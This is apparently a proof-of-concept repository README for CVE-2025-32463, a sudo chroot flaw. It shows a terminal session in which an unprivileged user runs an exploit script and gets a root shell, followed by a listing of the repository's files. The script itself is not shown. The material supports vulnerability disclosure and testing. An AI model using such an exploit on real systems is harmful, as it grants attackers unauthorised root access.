Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Executing the PoC on Ubuntu 24.04.2 LTS server with Sudo v1.9.15p5, using an unprivileged user with no Sudo rules defined, results in a root shell outside of the chrooted environment.
lowpriv@prod:~/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)
[4.0K] /data/pocs/13265d221e3ed52fd3dfe18baa822c6cebce7763
├── [ 627] CVE-2025-32463.sh
└── [ 600] README.md
0 directories, 2 files